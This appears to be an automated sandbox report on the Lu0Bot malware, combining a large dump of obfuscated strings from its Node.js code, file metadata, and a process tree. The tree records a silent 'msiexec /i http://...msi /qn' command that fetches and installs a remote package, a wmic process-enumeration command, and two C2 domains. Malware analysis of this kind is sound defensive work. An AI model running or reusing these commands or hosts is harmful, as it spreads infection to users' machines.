bvChx

ImLKw

bvChx

RHxXa

ZObVK

piwaH

18275d

kZvxL

indexOf

administrator

qhHca

LYcAl

kZvxL

indexOf

InILP

jLRkm

indexOf

EPYC

dkrmK

indexOf

TKtSZ

kZvxL

indexOf

DYNER

LWosO

indexOf

FvLcU

wMphB

win32

dkrmK

zMoPK

TTKHH

ubcMM

byXTc

dkrmK

indexOf

Xeon

indexOf

NOHID

LWosO

indexOf

NOUID

rIROs

byXTc

LYcAl

vuBDN

XjAHD

Jhjzq

XjAHD

HXyrf

ZUERy

a739

DtqlK

xdqpa

LYcAl

vuBDN

zMoPK

xdqpa

ubcMM

GNxrq

LjUoj

ojVSW

ifpMc

tlgVr

bpKnJ

pAaFc

wYWhN

kwYHp

LYcAl

zMoPK

FrpNt

AbICd

10.0.19045

FrpNt

dTIbB

FrpNt

LYcAl

zMoPK

10.0.19045

OqkCJ

e32aca

140

cNwAX

LYcAl

IVWgH

ubcMM

IVWgH

MxhkO

zHnKT

59a422

FCKbN

gKHJI

LYcAl

zMoPK

KvjLM

indexOf

6.1.

indexOf

fYSZv

KvjLM

indexOf

swTzr

142

uXAeF

LYcAl

zMoPK

vgIDw

indexOf

bARVU

uXAeF

JeOmc

b624

ceQLL

OJtSS

ceQLL

HWyjT

HcriV

LYcAl

6.1.7601

ceQLL

vuBDN

dkFQR

cqcXW

a6f2

cqcXW

UqSDH

IwbBw

cqcXW

LYcAl

cqcXW

IBETZ

vgIDw

indexOf

aZxDi

yRZxF

indexOf

zgdgD

IBETZ

RaBuf

IBETZ

nBeVS

OeKLg

KvghS

OeKLg

00181a

fCPBO

iEOdm

yLxTp

XTBlS

iZCfc

yLxTp

129654

f7e0fe

fjlZW

oovdk

LYcAl

kUFFE

tjxMV

NWucp

ubcMM

DGudg

fCmCf

MnULH

LYcAl

MnULH

PTLCN

hMyXK

YdnSH

HRkoM

OKMZw

147

YBlXB

win32

tjxMV

nlhwv

ubcMM

nlhwv

CemQK

nlhwv

hENkA

JOWJC

ZToZR

indexOf

swTzr

148

FjfUv

win32

HhpCs

SsQfU

ubcMM

EYqMo

yHqOb

IsVGp

SduTx

yHqOb

yAvHp

LJbxv

UAsdu

LYcAl

enjUJ

SsQfU

9a50

UAsdu

GVnrX

rZzup

pxBAp

win32

enjUJ

mtmUB

pxBAp

qfuEl

pxBAp

Uylzl

CJoVu

cuWCU

sqvsW

ZmVRy

mtljL

YHhXJ

indexOf

aZxDi

YHhXJ

indexOf

zgdgD

jOBsH

tFRNS

LYcAl

enjUJ

QkmSc

yHKXh

ubcMM

WjKSa

wRYVw

2088

152

WjKSa

LYcAl

WjKSa

GBlBu

WjKSa

YddPN

SUKmZ

hCTIY

9f72

XeVEQ

jLiUH

153

fmMKm

LYcAl

nFdbq

DzBlc

indexOf

fYSZv

indexOf

uFmNa

jnIvx

fmMKm

LYcAl

fmMKm

10.0.22621

fmMKm

bdKyI

bFSnP

kxtSP

bFSnP

KrJur

b4a2c8

NmSjg

LYcAl

ubcMM

KrJur

WpQto

indexOf

aZxDi

WpQto

indexOf

athEb

Yrbsc

RIAAG

LYcAl

oqbeM

AzHrm

indexOf

MhzIQ

RIAAG

EzqpJ

97a9d3

157

gYMkC

LYcAl

oqbeM

gYMkC

SKYJq

RzUnZ

2988b8

gYMkC

tbYIW

gYMkC

LYcAl

oqbeM

AzHrm

gYMkC

ubcMM

SfLoJ

Qfepj

gGKft

Qfepj

HNOfg

indexOf

sSBRg

OAmqQ

LYcAl

oqbeM

aCQtU

WpQto

indexOf

aZxDi

SMKZE

indexOf

WJiRC

Qfepj

10.0.18362

JDxSZ

6.1.7601

YFkWA

LYcAl

oqbeM

aCQtU

sHoho

ubcMM

HqEau

tgrPn

zaKHO

Dtcom

zaKHO

SDqCi

zaKHO

93a77b

MHqJW

zaKHO

LYcAl

OqPnN

aCQtU

UFaet

ySuYo

wRYVw

QRNVb

ZqKoF

mVAjG

JioFu

bpndq

ZiuqO

LYcAl

MvEmA

aCQtU

iUOws

LceQj

JOWJC

SMKZE

indexOf

swTzr

DjetE

LYcAl

CeCjW

NGOaK

164

Jemzi

LYcAl

ZJhcW

SMKZE

indexOf

uGlKU

SMKZE

indexOf

azure

Jemzi

ubcMM

lngmG

ZJhcW

indexOf

TKtSZ

UTWsh

LYcAl

Xcdew

dtaCQ

aYqtc

bVnFT

eGAVm

LYcAl

10.0.22621

jjdem

ykdtl

CiWUI

c350

GQcXj

QMKvd

LYcAl

QMKvd

RaBuf

czKQU

KkKjM

kkjvS

tXqft

LYcAl

Ajijk

aCQtU

miYSf

6.1.7601

wMWuw

IXSaM

lycfT

IXSaM

LYcAl

IXSaM

indexOf

6.1.

indexOf

qlfFI

indexOf

GAseQ

MCPGc

vDPhm

LYcAl

NiIRS

aCQtU

vDPhm

kbhla

ubcMM

kbhla

JzLqG

kbhla

55d8

SMKZE

indexOf

aZxDi

GqYaI

indexOf

zgdgD

nCYcK

LYcAl

10.0.22621

kbhla

keLQZ

lwOZh

172

keLQZ

LYcAl

thpqH

qdKkj

ubcMM

keLQZ

dfpVD

wWNuu

d60869

dfpVD

Renom

SRuAd

dfpVD

win32

vBLeg

ubcMM

vBLeg

tCLMh

vBLeg

nXFIT

HeFkv

vBLeg

LYcAl

qdKkj

HRRBe

ubcMM

bPGsQ

MhVPV

uGHss

otowc

6e6551

GqYaI

indexOf

sSBRg

RTfxC

otowc

LYcAl

otowc

CeCjW

uAiJp

indexOf

JtJrw

176

otowc

LYcAl

SswHv

indexOf

10.0

BbFPl

tvhQL

indexOf

DESKTOP

znzqH

tvhQL

736b19

JboKA

win32

qfuEl

tvhQL

eSOln

tvhQL

sinbV

tvhQL

BHCcz

178

tvhQL

LYcAl

qzadQ

qdKkj

SswHv

indexOf

InILP

iOjDA

indexOf

fYSZv

mVAjG

RiiOk

bac5dd

UoDFX

SSmiq

LYcAl

jkRku

mMjhn

ubcMM

NDEiX

indexOf

CplBP

NDEiX

indexOf

administrator

THXZK

SSmiq

LYcAl

igvrq

SSmiq

mNsLb

zEpcO

mNsLb

QzqaA

XBCIF

qDXbZ

LYcAl

FKoXL

qfuEl

FKoXL

JEbIX

JeePn

aXeGZ

DICEf

Ojlrh

aXeGZ

LYcAl

lknoE

PTLCN

aXeGZ

zoHIY

6d05

xJAHO

zoHIY

yKvar

KPWcq

BFEhv

LYcAl

BFEhv

PTLCN

xtDHl

5a1d

xtDHl

184

LYcAl

gBWLN

xtDHl

ubcMM

XGITv

NDEiX

indexOf

swTzr

RkRex

xtDHl

win32

xtDHl

qfuEl

indexOf

fYSZv

wDsOi

186

WcvdP

LYcAl

indexOf

6.1

WcvdP

indexOf

Xeon

zGwCl

FKsIA

zGwCl

VTjWR

GgDdB

ICSLx

LYcAl

bTwcP

igvrq

ubcMM

ICSLx

ECSEV

#56d4#

qqabp

BmErf

GNMzJ

lweQU

eupnK

LYcAl

ELyCm

qfuEl

UAVFP

yuNmd

ykdtl

mEMfX

ydllt

LYcAl

bTwcP

igvrq

ydllt

10.0.19044

CemQK

KETtt

kAuYq

TSkfY

indexOf

swTzr

JWaue

QGkEU

win32

LjQgX

SKYJq

KQxUG

lESyL

EICKi

QdQBE

FGSEG

QdQBE

8215e4

TSkfY

SVcUH

statSync

SxmRx

split

svPcs

length

khfiQ

WlpkV

length

doCxX

isArray

length

split

NRKqX

size

kuqcl

NULLz

uLqHQ

log

writeFileSync

pf1

readFileSync

kuqcl

UvEfz

padyp

statSync

pf1

size

iVwnl

axLdV

Mxgcq

readdirSync

qiJET

statSync

pf2

wHytV

nYOgr

log

gttk

YJHtQ

QJdIM

statSync

size

gXnCd

OwLXj

writeFileSync

pf2

readFileSync

writeFileSync

readFileSync

kXIhd

yPUXA

push

statSync

pf2

NRKqX

size

basename

pf1

basename

pf2

argv

YJHtQ

join

1|2|6|7|5|4|0|3

hUKkQ

split

GcWuZ

pf1

pf2

resolve

pf1

resolve

argv

resolve

pf2

resolve

argv

\Fonts\micross.ttf

hex

Washington1

Microsoft Root

BEjbd

KCXSS

KtzjC

wQJbi

readFileSync

length

UxNgT

length

toString

GYaRC

from

KngiY

toString

GYaRC

aSIWw

indexOf

from

fcFoa

toString

GYaRC

aSIWw

indexOf

KuaRs

FMZtH

5|3|2|4|1|0|6

length

yjwAp

BkMnD

nwSQY

FGDbi

split

push

args

push

path

length

path

name

session

push

pid

qPsLa

ppid

uncaughtException

BOFoU

YVoaN

msiexec.exe

jZhqX

bcCMQ

sBlNU

psls

yeYyx

qMFby

mvCNW

ZpMnM

bHIrW

BOFoU

pid

bbBrX

bwkBb

ppid

Drubx

PuecQ

ppid

PuecQ

ppid

SjuQG

OPqjE

length

ZnDWz

ebvFK

MwkBX

ZnDWz

WRQBY

gStRs

IwBNC

length

toLowerCase

indexOf

Duo

ZnDWz

WRQBY

Phssa

env

sfxname

length

basename

toLowerCase

out

outbuf

toString

outbuf

err

errbuf

toString

errbuf

ehwkb

yFlYS

yAoel

path

toLowerCase

name

toLowerCase

PuecQ

pid

Pkcbj

indexOf

HeRJS

indexOf

push

FHScw

length

session

push

pid

push

path

length

path

name

push

args

obYFQ

HpifN

ppid

HgJaj

length

WRQBY

oEpsP

Drubx

sAWfM

ppid

RuFBJ

ppid

fWKWx

yeYyx

OPqjE

OMPRC

length

from

hex

createDecipheriv

concat

update

final

toString

length

log

garhT

yeYyx

uerepl

bJkRq

removeAllListeners

log

otmdk

stack

log

stack

object

ignore

cmd.exe

mvykt

5|1|0|4|2|3

VDEMo

KjJFi

mvykt

Nawvx

split

createCipheriv

aes-128-cbc

slice

randomBytes

writeFileSync

prs

concat

update

final

from

stringify

maRrO

XGroP

stdio

gFZwL

detached

windowsHide

env

slice

unshift

RmEKx

shift

spawn

unref

2|3|1|4|0

aes-128-cbc

PLeLx

2|4|0|1|3

hShhL

PLeLx

xDGNH

split

concat

update

slice

final

parse

toString

readFileSync

prs

createDecipheriv

buPJa

slice

TNvTi

split

concat

update

slice

final

readFileSync

prs

createDecipheriv

buPJa

slice

parse

toString

randomBytes

EYcMe

TpSWo

rIGhr

KlEUW

vxDoJ

KlEUW

OOsZl

9|3|0|10|7|5|4|6|2|1|8

NYklt

XytJK

BBGWM

gBXWb

MgYWX

bBlGN

CMiID

VpUzp

split

slice

toString

ytwPn

readUInt16BE

slice

createDecipheriv

aes-128-cbc

slice

bQxLq

CQNpO

length

concat

update

slice

CPCpV

final

readUInt16BE

kUDov

length

bEEds

NvYgc

GzeoH

pDPWG

RBODK

nHNVX

6|3|15|11|28|7|23|21|19|29|9|1|12|20|17|18|14|26|8|31|10|13|0|22|4|27|5|25|30|2|24|16

x64

PROCESSOR_ARCHITECTURE

USERNAME

string

USER

Unknown

PROCESSOR_ARCHITEW6432

.exe

HSNJD

gmkYY

C:\

rpcsrv

cyjYv

tmpbuild

LU0TO

.txt

uoBON

aTwZZ

hwv

wfr

atct

iFsSn

argv

indexOf

MWUPP

argv

MWUPP

pjqha

cHXhW

argv

lPeOo

rGWIB

hLobF

argv

YcJrg

LU0TO

ziaEZ

pxiUI

RbAZq

jSgBj

mMYXA

readdirSync

UeFEr

xMcTu

indexOf

umYXd

EGHaW

EsGlg

Oermu

aEaYv

FWdPf

PiyHt

BSCha

pTvLi

C:\

umYXd

AwEKN

YELYn

_i_

kzmFY

xhSjM

thtsc

HAxab

readFileSync

toString

trim

CDAeQ

split

XDera

hostname

length

substr

platform

length

model

trim

speed

gjtnJ

length

substr

uptime

NVtqW

GcRkC

string

OLLVI

indexOf

maKOT

pdXBJ

TFMpp

ccboV

xMcTu

indexOf

versions

node

arch

cwd

tmpdir

lXTPo

tNcbT

freemem

cpus

totalmem

gjtnJ

length

substr

gjtnJ

length

substr

XOGWk

length

release

GYKbo

WzjKK

length

substr

lXTPo

jVOiJ

statSync

ppid

length

tree

WneRM

YcJrg

log

Ycdhb

uCXXt

log

FsDkT

isc

log

sfre

log

ExCmM

lMoNX

aes-128-cbc

JBHlW

UI16LE

STR16

Console

sbchn

oueay

KHBwP

uErvp

SdNaq

LpYvX

KxIpI

yHWdS

CSVQx

aYqqX

VUrjf

xFzkE

SlgYb

vlZWz

SkrMU

prsf

prsi

331db0

sFODx

add

Installed

REG_DWORD

s1b

epPtz

base64

LU0

hNNaV

XsIQt

log

kZpEO

cOoUo

now

prs

pslo

jWPrK

XIGNJ

QfhqL

now

ata

cta

prs

jnWnI

hzZUP

SGDdd

YyQSN

lOynJ

Bxdxx

WUDBf

fill

lOynJ

GtLvE

DTJFS

zzZJM

KjSNj

GtLvE

VvbRQ

kcziQ

vRDoA

uRbju

dtuSh

hzZUP

pslo

lOynJ

9|2|1|6|3|7|4|0|5|8|10

split

concat

update

slice

PIgoE

final

slice

readUInt16BE

createDecipheriv

LVFfp

slice

QRJCj

readUInt16BE

EJxXm

dUsdf

length

slice

toString

YVgKz

KlfqY

length

vRDoA

LpYvX

HWVMV

lOynJ

chdir

log

Unpacking installer archive ...

MeZyi

qSQpE

TNWWy

SGDdd

lOynJ

ubhTr

OQwsQ

HrqeZ

Gjhpj

prs

UwZNV

prs

exit

s1e

argv

HzXRp

UwZNV

argv

slice

TNWWy

BrHSF

CSVQx

QwKDj

resolve

dirname

resolve

Jrwlq

sep

basename

Jrwlq

sep

basename

BrHSF

UmdMo

mkdirSync

writeFileSync

trim

BZVtt

Ziqhv

writeFileSync

readFileSync

zzZJM

RuXaF

ppid

RuXaF

ppid

CTdhA

ItMVH

UuQKi

xFzkE

statSync

writeFileSync

readFileSync

ItMVH

NNoSG

uTCdl

chdir

args

trim

llfYV

joXWx

length

WGway

RUwym

log

stack

log

stack

qABGy

SGDdd

ubhTr

pDQjd

PtceX

Fxiyt

3|2|4|5|1|0|6

split

push

args

push

path

length

path

name

session

push

pid

Iffsb

ezoom

ppid

prsi

log

kUTlh

qpvjl

prs

CTdhA

prs

log

vzlQO

prsi

aQULL

XzkZG

nEGVI

milRK

3|0|1|2|4|5

split

randomBytes

createCipheriv

DTJFS

slice

concat

update

final

from

stringify

writeFileSync

prs

qABGy

reg.exe

sPloU

HKCU\Software\SPoloCleaner

deLAG

OskLU

YQTpV

log

LvJGf

pDQjd

njVaJ

parse

CTdhA

from

env

LU0

XPQYA

toString

statSync

pf2

env

LU0

TiDxv

s1e

tHAxk

euBGH

GJqrD

s1e

pid

session

path

bIqiH

Services

vrsav

YQTpV

Unknown

USER

PROCESSOR_ARCHITECTURE

PROCESSOR_ARCHITEW6432

string

CzSsd

x64

GvCHV

platform

arch

release

uptime

totalmem

freemem

XEFIo

hostname

WEBKT

USERNAME

WEBKT

lufsU

cwd

tmpdir

versions

node

QIgiw

zQuFu

iVFAF

uYlVs

BGrFb

jvmuq

indexOf

uYlVs

string

indexOf

rsypM

nAaLn

cpus

length

ZRPRQ

XrXQK

length

model

trim

speed

createHash

sha256

update

createHash

digest

slice

xpJek

OSVMN

GUZAm

length

substr

length

substr

BluXS

length

substr

fQqDl

length

substr

tPUvy

length

substr

CwarM

sha256

createHash

UUWAF

ETWjT

CwarM

RZdQo

createHash

GlQcv

update

kZibB

digest

slice

lBmvY

aes-128-cbc

fNpsq

randomBytes

alloc

writeUInt16BE

concat

from

createCipheriv

RakuR

slice

concat

update

final

ICMxb

length

lgJsq

jgUjJ

lgJsq

concat

alloc

undefined

CkyNN

7|10|3|8|1|2|5|0|4|9|6

aes-128-cbc

VAwpz

ONvox

KUyTf

uPokQ

undefined

code

IQeKE

gQfwn

signal

cEXlG

split

concat

update

slice

RyFyi

final

readUInt16BE

msXNc

RyFyi

length

readUInt16BE

createDecipheriv

fuMav

slice

oYwrq

length

slice

toString

slice

now

random

recv

NUTmk

log

qlUyC

tkstp

FOySH

sha256

fVDCM

BKyih

zSvXN

JgSJe

RagnH

gttk

uCCOi

test

LuJtm

vVzOv

KpbzS

udp4

message

aYpxc

SGxtm

log

Wtznl

Mnmfx

Wbfcy

now

LNkUx

exit

vSpKC

mjJRG

MSvsB

uYPAd

length

argv

split

join

stringify

gttk

mjJRG

length

KnAhW

log

pcBre

RFqCN

qYTqa

DpqAT

writeFileSync

trim

mkdirSync

exit

mkdirSync

RFqCN

XseeU

createHash

RsRvu

update

digest

createSocket

KkphW

error

ElajD

tkstp

dXjxZ

XoAeD

nlknT

prs

ThRml

prs

exit

ciwXY

att

nXUFB

rEAUe

mwcHf

luIzx

DZQsV

length

model

trim

speed

send

length

VRHhP

length

from

hex

ZinjH

VRHhP

LqBOo

createDecipheriv

concat

update

final

toString

outbuf

push

cmd.exe

msiexec.exe

UI16LE

STR16

reg.exe

Installed

REG_DWORD

xRBkA

slfJt

GzDcB

KjGvF

YzgKb

SwKBS

unshift

lRbcb

GHZBz

KjGvF

DaUSC

KLgEs

DSCRu

length

mbAGw

toLowerCase

indexOf

log

KjGvF

pbuah

KvRNw

EPiVs

workdir

sEZVw

length

pqFNG

length

xieTS

AQTwy

EZKTH

aAyle

log

xieTS

JELgG

add

HKCU\Software\SPoloCleaner

QWElE

ATEAs

NsTMA

FXwcI

BcSIS

6|1|0|7|3|5|2|4

VThcY

ini

isc

from

GqwPH

aHSTW

nbCwj

HCaao

alloc

noaDT

qYdtF

RhhPR

fill

writeFileSync

pf2

readFileSync

allocUnsafe

noaDT

GLoeO

qAfxN

kill

FHdIK

versions

node

indexOf

uerepl

FHdIK

VThcY

aIKcr

uerepl

uncaughtException

removeAllListeners

iiiKA

UeHdV

log

xQGAd

stack

log

stack

EPMQW

split

resolve

pf2

resolve

pf1

FNiyb

resolve

argv

oRdOT

pf1

pf2

resolve

argv

length

dDbZE

length

exit

from

base64

log

JQuhE

OoTuZ

log

grNMK

isc

OoTuZ

ocDIh

No Malware configuration.

Add for printing

TRiD

.exe	\|	Win64 Executable (generic) (64.6)
.dll	\|	Win32 Dynamic Link Library (generic) (15.3)
.exe	\|	Win32 Executable (generic) (10.5)
.exe	\|	Generic Win/DOS Executable (4.6)
.exe	\|	DOS Executable Generic (4.6)

EXIF

EXE

MachineType:	Intel 386 or later, and compatibles
TimeStamp:	0000:00:00 00:00:00
ImageFileCharacteristics:	No relocs, Executable, No line numbers, No symbols, 32-bit, No debug
PEType:	PE32
LinkerVersion:	6
CodeSize:	512
InitializedDataSize:	1024
UninitializedDataSize:	-
EntryPoint:	0x1000
OSVersion:	4
ImageVersion:	-
SubsystemVersion:	4
Subsystem:	Windows GUI

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

2900

C:\Windows\system32\msiexec.exe /V

C:\Windows\System32\msiexec.exe

services.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Windows® installer

Exit code:

Version:

5.0.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll

3204

cmd /d /c start msiexec /i http://231102233316011.tto.kiw46.cloud/f/fsft1102011.msi /qn

C:\Windows\System32\cmd.exe

—

TrainerFL-build.36449.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Exit code:

Version:

6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll

3276

"C:\Users\admin\AppData\Local\Temp\nehfvlgoxd\frdlcqsqkkw.exe" "C:\Users\admin\AppData\Local\Temp\nehfvlgoxd\lvardebkhw.dat" 2526413347

C:\Users\admin\AppData\Local\Temp\nehfvlgoxd\frdlcqsqkkw.exe

—

msiexec.exe

User:

admin

Company:

Joyent, Inc

Integrity Level:

MEDIUM

Description:

Evented I/O for V8 JavaScript

Exit code:

Version:

0.10.41

Modules

Images
c:\users\admin\appdata\local\temp\nehfvlgoxd\frdlcqsqkkw.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll

3372

msiexec /i http://231102233316011.tto.kiw46.cloud/f/fsft1102011.msi /qn

C:\Windows\System32\msiexec.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows® installer

Exit code:

Version:

5.0.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll

3380

"C:\Program Files\Windows Media Player\wmpnscfg.exe"

C:\Program Files\Windows Media Player\wmpnscfg.exe

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Media Player Network Sharing Service Configuration Application

Exit code:

Version:

12.0.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ole32.dll

3460

"C:\Users\admin\AppData\Local\Temp\TrainerFL-build.36449.exe"

C:\Users\admin\AppData\Local\Temp\TrainerFL-build.36449.exe

—

explorer.exe

User:

admin

Integrity Level:

MEDIUM

Exit code:

Modules

Images
c:\users\admin\appdata\local\temp\trainerfl-build.36449.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll

3612

C:\Windows\system32\MsiExec.exe -Embedding 52FA05E9BBF57885C48581DFAD542996

C:\Windows\System32\msiexec.exe

—

msiexec.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows® installer

Exit code:

Version:

5.0.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll

3644

wmic process get processid,parentprocessid,name,executablepath,commandline /format:csv

C:\Windows\System32\wbem\WMIC.exe

—

frdlcqsqkkw.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

WMI Commandline Utility

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll

3744

"C:\Program Files\Windows Media Player\wmpnscfg.exe"

C:\Program Files\Windows Media Player\wmpnscfg.exe

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Media Player Network Sharing Service Configuration Application

Exit code:

Version:

12.0.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ole32.dll

3936

C:\Users\admin\AppData\Local\Temp\nehfvlgoxd\frdlcqsqkkw.exe C:\Users\admin\AppData\Local\Temp\nehfvlgoxd\lvardebkhw.dat 2526413347 2473250667

C:\Users\admin\AppData\Local\Temp\nehfvlgoxd\frdlcqsqkkw.exe

frdlcqsqkkw.exe

User:

admin

Company:

Joyent, Inc

Integrity Level:

MEDIUM

Description:

Evented I/O for V8 JavaScript

Exit code:

Version:

0.10.41

Modules

Images
c:\users\admin\appdata\local\temp\nehfvlgoxd\frdlcqsqkkw.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll

Lu0Bot

(PID) Process(3936) frdlcqsqkkw.exe

С2 (2)aoa.aent78.sbs

otl.dwt51.shop

Strings (7585)a9d3ce6f

*.aoa.aent78.sbs

c502f0

*.otl.dwt51.shop

require

mainModule

require

crypto

path

sep

dgram

child_process

env

toLowerCase

env

0|4|3|2|1

ignore

piDxQ

hyeBg

cmd.exe

vSfZo

object

stdio

aEdOr

detached

windowsHide

env

slice

EyMRi

wAOxW

unshift

uvmgM

EYfte

split

file

hnLBN

file

oEKCd

file

indexOf

shift

spawn

unref

5|3|0|1|4|2

sinVJ

wKzUO

eIJSa

ykrOI

undefined

3|0|4|2|1

UI8

UI16LE

mcjvG

VZACF

EUfXa

VqqWC

AQuOp

oEsUi

GPHHp

boves

function

aUMbk

bUAQH

pipe

error

data

ekYDE

nKdDR

nZWJI

NITrg

vRMEa

ObSxa

split

log

recv

tkstp

rGPIJ

NqovF

CrcrZ

object

stdio

qVJqC

detached

windowsHide

env

slice

shift

spawn

timeout

ktmr

qLYLY

hyUzV

lccDs

zchbt

sinVJ

push

kCBfd

pid

name

ppid

SZZzF

length

ierna

ppid

kill

alIOC

timeout

once

vDeBx

kTJWU

qWrBv

error

file

once

exit

kTJWU

pvCBr

IWmUb

nkpDN

eMWcf

code

LoVER

undefined

signal

once

IgivP

CrcrZ

UnzSb

kcpEI

env

sfxname

length

basename

toLowerCase

ktmr

lccDs

Giijj

LTGDi

MXQOo

ktmr

viWCt

split

XPQea

UI8

push

alloc

cZitH

ddkDB

lveXg

push

from

jJEhJ

error

lccDs

znskM

ypRcH

pslo

Vhkau

KhcRG

error

eMWcf

code

RquQP

eMWcf

signal

outbuf

concat

outbuf

errbuf

concat

errbuf

returnbuffer

wPgOL

QfxAR

out

outbuf

toString

outbuf

err

errbuf

toString

errbuf

att

RQIwT

nostr

out

stdout

data

HuyAR

mGknf

fSqiT

LICyF

FICqj

wwgtM

RTsBH

outbuf

push

randomBytes

LlITi

UBQwg

QhXfr

AYJnc

CuSZz

tnljK

WjDUe

stderr

dmatX

lccDs

WzjkH

knqua

outerr

push

env

toLowerCase

env

2|4|3|6|0|5|1

MXaeg

split

length

push

IDYOu

yBpnD

pid

name

ppid

Undefined

1|0|2|3|5|4

LZxwS

sCNdd

Node,

VzIVR

bGJKE

EsNhG

commandline

parentprocessid

ppid

processid

pid

name

tqIJF

Console

Services

ZuvMN

xfzQa

pAfqI

6.0

wmic

process

get

processid,parentprocessid,name,executablepath,commandline

/format:csv

release

indexOf

qScEy

indexOf

YAGOu

TtWDK

GdHJC

VrUqk

rAzPR

kzDDs

auChY

rTxky

wIbzL

MpJuw

qScEy

xtBih

bNZpp

WXfYZ

oEtKr

length

split

join

split

length

shift

yJQhi

indexOf

HpUNl

qScEy

oGKSR

split

shift

RHVDE

length

BAgHi

KzXJc

wDIHC

split

rRELb

length

qScEy

JmzEG

AbVfi

length

JqzXA

ktmr

toLowerCase

BLIwB

args

length

executablepath

path

length

UWFXT

VTyie

lEYjL

HBAsu

QtsdO

pid

Node

pid

RzPtp

tqIJF

pid

session

path

vOIcz

jTRhC

BAgHi

BTGuc

ZuvMN

statSync

pf2

pid

EeKJG

JJPjN

CVUsn

BeHNx

isGPW

iNURG

OLQlN

isGPW

iNURG

Pvvmm

split

randomBytes

from

stringify

createCipheriv

aes-128-cbc

slice

concat

update

final

writeFileSync

prs

BAgHi

UeYHX

WUDbU

GdHJC

ppid

length

tree

vgOqH

file

TtWDK

undefined

createHash

windir

systemroot

temp

allusersprofile

username

\networkservice\

network service

system

dwm-

cBTHL

isc

LDbUw

gSEzq

dQsmb

tmp

LuuXR

aup

LMSts

Pbxte

apd

LMSts

appdata

usr

LMSts

Pcfym

tmp

isc

tmp

toLowerCase

indexOf

toLowerCase

isc

DhcCy

tmp

toLowerCase

indexOf

ldXuQ

isc

aup

apd

isc

usr

isc

LTZEW

mqJYj

usr

toLowerCase

lzwRd

IpGEw

XruUq

QyAnj

WBtMq

local service

WBtMq

substr

jfcqi

length

indexOf

rkVHB

indexOf

umfd-

AMxHe

wSBLl

QoYfN

ktmr

vckIR

ktmr

error

JmqAI

code

ZnvcO

JmqAI

signal

outbuf

concat

outbuf

errbuf

concat

errbuf

returnbuffer

out

outbuf

toString

outbuf
